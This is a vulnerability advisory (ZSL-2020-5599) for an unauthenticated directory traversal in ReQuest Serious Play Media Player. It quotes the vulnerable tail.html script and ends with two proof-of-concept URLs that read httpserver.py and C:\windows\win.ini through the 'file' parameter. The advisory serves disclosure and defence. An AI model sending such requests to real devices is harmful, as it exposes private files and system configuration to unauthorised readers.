ReQuest Serious Play Media Player 3.0 File Disclosure / Path Traversal

2020.10.19
mk LiquidWorm (MK) mk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability Vendor: ReQuest Serious Play LLC Product web page: http://www.request.com Affected version: 3.0.0 2.1.0.831 1.5.2.822 1.5.2.821 1.5.1.820 Summary: With the MediaPlayer, ReQuest delivers video content and award-winning distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an approved NAS) can be connected through your home network to your ReQuest system, delivering HD video to your television in 1080p via HDMI outputs. Desc: The device suffers from an unauthenticated file disclosure vulnerability when input passed through the 'file' parameter in tail.html and file.html script is not properly verified before being used to read web log files. This can be exploited to disclose contents of files from local resources. =============================================================================== /tail.html: ----------- function load_data() { var elem = $("#data"); $.ajax({url:"tail.html", data:{ file:elem.attr("file"), start:elem.attr("nextstart"), tail:elem.attr("tail")?elem.attr("tail"):undefined, max:elem.attr("max")?elem.attr("max"):undefined}, cache:false, async:true, success:show_data} ); } function main_start() { $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"}); window.setTimeout(load_data, 1); } function show_data(data, status, jqxhr) { var data = $("filedata", data); var newdata = data.attr("data"); var start = data.attr("start"); var nextstart = data.attr("nextstart"); var elem = $("#data"); var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20); elem.attr({tail:"", start:start, nextstart:nextstart}); if (newdata.length) elem.append(htmlspecialchars(newdata)); var delay = parseFloat(elem.attr("update"))*1000; if (isNaN(delay)) delay = 5000; if (at_end) $("html,body").scrollTop($(document).height()); window.setTimeout(load_data, delay); } $(document).ready(main_start); =============================================================================== Tested on: ReQuestHTTP/0.1 httpserver/0.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5599 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php 01.08.2020 -- http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py http://192.168.1.17:8001/file.html?file=C:\windows\win.ini


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top